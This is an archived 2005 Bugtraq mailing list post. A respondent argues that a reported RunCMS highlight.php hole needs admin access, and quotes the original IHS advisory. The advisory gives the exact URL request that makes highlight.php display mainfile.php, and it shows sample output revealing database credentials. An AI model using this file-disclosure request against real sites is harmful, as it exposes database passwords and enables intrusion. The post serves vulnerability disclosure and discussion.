lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 18 Aug 2005 10:37:02 +0700
From: Security Lists <secure@...online.com>
To: bugtraq@...urityfocus.com
Subject: runcms highlight.php hole


This is a stupid BUG report.
They found the bug without checking the script or they know but dont 
said about it to promote their group.

The truth is the script is allow only user that have the right to access 
the "systems" module to use it,
this mean only admin and some moderators/users that have the right to 
access "systems" module can use this script.
Normal users and unregistered user can not use this script, does this 
should call BUG ?
It's mean he found this bug when he logged in as admin, once he is 
logged out he will never success again until.

What's does this code mean???
if ($xoopsUser) {
	$xoopsModule = XoopsModule::getByDirname('system');
	if ( !$xoopsUser->isAdmin($xoopsModule->mid()) ) {
		redirect_header(XOOPS_URL.'/', 3, _NOPERM);
		exit();
	}
	} else {
		redirect_header(XOOPS_URL.'/', 3, _NOPERM);
		exit();
	}


----------------------


********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT                   NT@...team.com
********************************************
If You Have RUNCMS Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In RUNCMS 1.1A
-------------------------------------------
Input This Line To Your Browser AddressBar :

http://targetsite/runcmsinstalation/class/debug/highlight.php?
file=runcmsinstallationpath\mainfile.php&line=151#151

Like This :

http://localhost/runcms/class/debug/highlight.php?
file=c:\phpdev\www\runcms\mainfile.php&line=151#151

You See This Result :

1  <?php
2 // -------------------------------------------------------------------
------ //
3 //               E-Xoops: Content Management for the
Masses                  //
4 //                       < http://www.e-xoops.com
>                          // 
5 // -------------------------------------------------------------------
------ //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8     define('XOOPS_MAINFILE_INCLUDED', 1);
9
10     // Physical Path
11     // Physical path to your main RUNCMS directory WITHOUT trailing
slash. ( On windows use simple forward slashes & be sure to include the
drive letter. c:/myfolder )
12     define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');
13
14     // Virtual Path (URL)
15     // Virtual path to your main RUNCMS directory WITHOUT trailing
slash. ( http://www.mysite.com/myfolder )
16     define('XOOPS_URL', 'http://localhost/runcms1.1');
17
18     // Database
19     // Choose the type of database to be used.
20     $xoopsConfig['database'] = 'mysql';
21
22     // Table Prefix
23     // This prefix will be added to all new tables created to avoid
name conflict in the database. If you are unsure, just use the
default 'runcms'.
24     $xoopsConfig['prefix'] = 'runcms';
25
26     // Database Hostname
27     // Hostname of the database server. ( If you are
unsure, 'localhost' works in most cases. )
28     $xoopsConfig['dbhost'] = 'localhost';
29
30     // Database Username
31     // Your database user account on the host. ( Often root when
installed on your local machine. )
32     $xoopsConfig['dbuname'] = 'root';
33
34     // Database Password
35     // Password for your database user account.
36     $xoopsConfig['dbpass'] = '';
37
38     // Database Name
39     // The name of database on the host. The installer will attempt
to create the database if not exist.
40     $xoopsConfig['dbname'] = 'aaa';
41
42     // Use persistent connection? (Yes=1 No=0)
43     // Default is 'No'. Choose 'No' if you are unsure.
44     $xoopsConfig['db_pconnect'] = 0;
45
46     // Default setup language.
47     $xoopsConfig['default_language'] = 'english';
48
49     include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 }
?>



------------------------------------------

More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12

Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14

Found By NT(IHS)
NT@...Team.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com


-- 
www.IHSTEAM.com
www.IHSSECURITY.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ